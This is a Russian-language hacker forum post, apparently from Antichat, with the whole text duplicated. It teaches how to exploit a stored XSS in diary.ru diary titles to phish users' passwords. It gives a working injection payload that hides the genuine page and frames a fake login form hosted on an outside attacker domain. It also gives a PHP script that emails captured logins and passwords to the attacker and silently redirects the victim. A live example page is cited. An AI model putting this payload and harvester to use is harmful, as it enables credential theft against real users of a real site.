XenOtai
11.09.2007, 21:49
Добрый вечер, с вами XenOtai.
Если вы внимательно следите за темой активных хсс, то наверняка видели найденную мной активку на diary.ru. Напомню, что находится она в названии дневника. Положим, вы украли куки, но Вам хочется большего. То есть пароля.
Но что, если он сложный и расшифровать его не удалось? Тогда первый выход, который приходит в голову – фишинг. Сделать фальшивую авторизацию, и как только чел зайдёт на свой дневник, его переадресует на сделанную нами форму.
Одна проблемка – адрес-то в адресной строке сменится на другой, пусть и похожий. Вы наверняка задавались вопросом, как же этого можно избежать.
Итак, заходим на дайри. Вбиваем <xss> в название дневника, бежим смотреть исходник – действительно, фильтрации 0. При этом наш тег выводится в параметре title:
<title>@дневники — <xss></title>
Итак, что нам надо осуществить? Нам нужно:
А) Фрейм в теле страницы.
Б) Скрыть всё лишнее.
Как скрыть лишнее? Оч просто: <body style="visibility:hidden;">
Так как даже если посередине страницы поставить </body></html>, браузер всё равно отображает дальше, но учитывает параметры, различные в каждом теге, то наш стиль прекрасненько отобразиться! Теперь фрейм! Обычный фрейм не годится, поскольку он исчезнет вместе с боди, нам нужен iframe.
Итак, финальный код:
</title><iframe src=http://fuckinghack.ru/auth.html location=top width="1003" height="1800" hspace=0 vspace=0><body style="visibility:hidden;">
Подбираем ширину и высоту по нашей нужде, фрейм отображает страницу, которая отошлёт данные нашему скрипту, который, обработав их, отошлёт на нашу почту.
Для тех, кто в танке, код скрипта (кто-то выкладывал на ачате :) ):
<?
$to = "hacker@hacker.ru" . ", " ; //ваше мыло
$subject = "Заход на diary.ru через ваш фейк"; //тема сообщения
$message = "Через ваш фейк на мыло зашли
Login: $login
Password: $passwd"; //само сообщение. Если хотите изменить, то только верхнюю строчку.
$otpravitel = "M@IL Corp <admin@win.mail.ru>";
$headers = "MIME-Version: 1.0";
$headers .= "Content-type: text/$tipe; charset=windows-1251";
$headers .= "From: $otpravitel";
mail($to, $subject, $message, $headers); //отправляем сообщение
header("Location: http://diary.ru");
//при правильном вводе пароля жертва будет переадресовываться на дайри, как будто ничего не было (хорошо бы устроить переадресацию на какой-нибудь дневник, потому что адресная строка останется прежней), но вам отправится пароль
exit;
?>
Чего мы достигли: Фейк на дневнике, с адресом дневника. Пример (оптимизировано под 1024х768): http://diary.ru/~roboboy/
«Удачи мне надо бежать а то я всю ночь не спал то что говорит что я убежал спать». (с) Dracula4ever
XenOtai special for Antichat.ru
Если вы внимательно следите за темой активных хсс, то наверняка видели найденную мной активку на diary.ru. Напомню, что находится она в названии дневника. Положим, вы украли куки, но Вам хочется большего. То есть пароля.
Но что, если он сложный и расшифровать его не удалось? Тогда первый выход, который приходит в голову – фишинг. Сделать фальшивую авторизацию, и как только чел зайдёт на свой дневник, его переадресует на сделанную нами форму.
Одна проблемка – адрес-то в адресной строке сменится на другой, пусть и похожий. Вы наверняка задавались вопросом, как же этого можно избежать.
Итак, заходим на дайри. Вбиваем <xss> в название дневника, бежим смотреть исходник – действительно, фильтрации 0. При этом наш тег выводится в параметре title:
<title>@дневники — <xss></title>
Итак, что нам надо осуществить? Нам нужно:
А) Фрейм в теле страницы.
Б) Скрыть всё лишнее.
Как скрыть лишнее? Оч просто: <body style="visibility:hidden;">
Так как даже если посередине страницы поставить </body></html>, браузер всё равно отображает дальше, но учитывает параметры, различные в каждом теге, то наш стиль прекрасненько отобразиться! Теперь фрейм! Обычный фрейм не годится, поскольку он исчезнет вместе с боди, нам нужен iframe.
Итак, финальный код:
</title><iframe src=http://fuckinghack.ru/auth.html location=top width="1003" height="1800" hspace=0 vspace=0><body style="visibility:hidden;">
Подбираем ширину и высоту по нашей нужде, фрейм отображает страницу, которая отошлёт данные нашему скрипту, который, обработав их, отошлёт на нашу почту.
Для тех, кто в танке, код скрипта (кто-то выкладывал на ачате :) ):
<?
$to = "hacker@hacker.ru" . ", " ; //ваше мыло
$subject = "Заход на diary.ru через ваш фейк"; //тема сообщения
$message = "Через ваш фейк на мыло зашли
Login: $login
Password: $passwd"; //само сообщение. Если хотите изменить, то только верхнюю строчку.
$otpravitel = "M@IL Corp <admin@win.mail.ru>";
$headers = "MIME-Version: 1.0";
$headers .= "Content-type: text/$tipe; charset=windows-1251";
$headers .= "From: $otpravitel";
mail($to, $subject, $message, $headers); //отправляем сообщение
header("Location: http://diary.ru");
//при правильном вводе пароля жертва будет переадресовываться на дайри, как будто ничего не было (хорошо бы устроить переадресацию на какой-нибудь дневник, потому что адресная строка останется прежней), но вам отправится пароль
exit;
?>
Чего мы достигли: Фейк на дневнике, с адресом дневника. Пример (оптимизировано под 1024х768): http://diary.ru/~roboboy/
«Удачи мне надо бежать а то я всю ночь не спал то что говорит что я убежал спать». (с) Dracula4ever
XenOtai special for Antichat.ru